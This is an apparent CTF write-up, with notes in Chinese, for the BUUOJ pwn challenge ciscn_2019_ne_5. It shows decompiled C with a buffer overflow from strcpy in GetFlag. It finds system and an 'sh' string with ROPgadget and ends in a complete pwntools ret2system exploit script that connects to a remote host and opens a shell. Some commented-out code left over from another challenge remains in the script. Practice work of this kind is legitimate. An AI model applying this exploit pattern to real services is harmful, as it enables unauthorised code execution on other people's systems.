int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax
int v4; // [esp+0h] [ebp-100h] BYREF
char src[4]; // [esp+4h] [ebp-FCh] BYREF
char v6[124]; // [esp+8h] [ebp-F8h] BYREF
char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
char v8[96]; // [esp+88h] [ebp-78h] BYREF
int *p_argc; // [esp+F4h] [ebp-Ch]
p_argc = &argc;
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
fflush(stdout);
*(_DWORD *)s1 = 48;
memset(v8, 0, sizeof(v8));
*(_DWORD *)src = 48;
memset(v6, 0, sizeof(v6));
puts("Welcome to use LFS.");
printf("Please input admin password:");
__isoc99_scanf("%100s", s1);
if ( strcmp(s1, "administrator") )
{
puts("Password Error!");
exit(0);
}
puts("Welcome!");
puts("Input your operation:");
puts("1.Add a log.");
puts("2.Display all logs.");
puts("3.Print all logs.");
printf("0.Exit\n:");
__isoc99_scanf("%d", &v4);
switch ( v4 )
{
case 0:
exit(0);
return result;
case 1:
AddLog(src);
result = sub_804892B(argc, argv, envp);
break;
case 2:
Display(src);
result = sub_804892B(argc, argv, envp);
break;
case 3:
Print();
result = sub_804892B(argc, argv, envp);
break;
case 4:
GetFlag(src);
result = sub_804892B(argc, argv, envp);
break;
default:
result = sub_804892B(argc, argv, envp);
break;
}
return result;
}
int __cdecl GetFlag(char *src)
{
char dest[4]; // [esp+0h] [ebp-48h] BYREF
char v3[60]; // [esp+4h] [ebp-44h] BYREF
*(_DWORD *)dest = 48;
memset(v3, 0, sizeof(v3));
strcpy(dest, src);
return printf("The flag is your log:%s\n", dest);
}
对应查看log函数
int __cdecl AddLog(int a1)
{
printf("Please input new log info:");
return __isoc99_scanf("%128s", a1);
}
a1就是外面的src,程序给的大小是48
通过 __isoc99_scanf("%100s", s1); //
选择1 可以__isoc99_scanf("%128s", a1); 溢出到 bin/sh 选择4
然后选4去调用读取我们构造好的栈,获取shell
于是查找可用字符串 system
system_addr=elf.sym['system']
尝试用ROPgadget来搜索一下程序里的’/bin/sh’字符串的地址的,没有找到,但是发现有‘sh’字符串,这个效果和‘/bin/sh’是一样的效果
ROPgadget --binary ciscn_2019_ne_5 --string 'sh'
sh_addr=0x080482ea
这样我们就可以构造我们的payload=‘a’*(0x48+4)+p32(system_addr)+‘aaaa’+p32(sh_addr)
之后选4去调用我们的这个构造好的栈即可获取shell
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
r = remote("node4.buuoj.cn", 29919)
# r = process("./pwn2_sctf_2016")
elf = ELF("ciscn_2019_ne_5")
system_addr=elf.sym['system']
# printf_plt = elf.plt['printf']
# printf_got = elf.got['printf']
#start = elf.sym['_start']
#payload = flat([ 'a'*(0x2c+4), printf_plt, start, printf_got ])
#r.sendlineafter("How many bytes do you want me to read?", "-1")
#r.sendlineafter("of data!", payload)
#r.recvline()
# r.recvline()
#printf_addr = u32(r.recv(4))
# log.success("printf addr => {}".format(hex(printf_addr)))
# libc = LibcSearcher("printf", printf_addr)
# base = printf_addr - libc.dump("printf")
# system = base + libc.dump("system")
# binsh = base + libc.dump("str_bin_sh")
#system = printf_addr -0xe6e0
#binsh = printf_addr +0x11000b
#payload1 = flat([ 'a'*(0x2c+4), system, start, binsh ])
#r.sendlineafter("How many bytes do you want me to read?", "-1")
#r.sendlineafter("of data!", payload1)
shell_addr=0x80482ea
r.recvuntil('Please input admin password:')
r.sendline('administrator')
r.recvuntil('0.Exit\n:')
r.sendline('1')
payload='a'*(0x48+4)+p32(system_addr).decode('unicode_escape')+'1234'+p32(shell_addr).decode('unicode_escape')
r.recvuntil('Please input new log info:')
r.sendline(payload)
r.recvuntil('0.Exit\n:')
r.sendline('4')
r.interactive()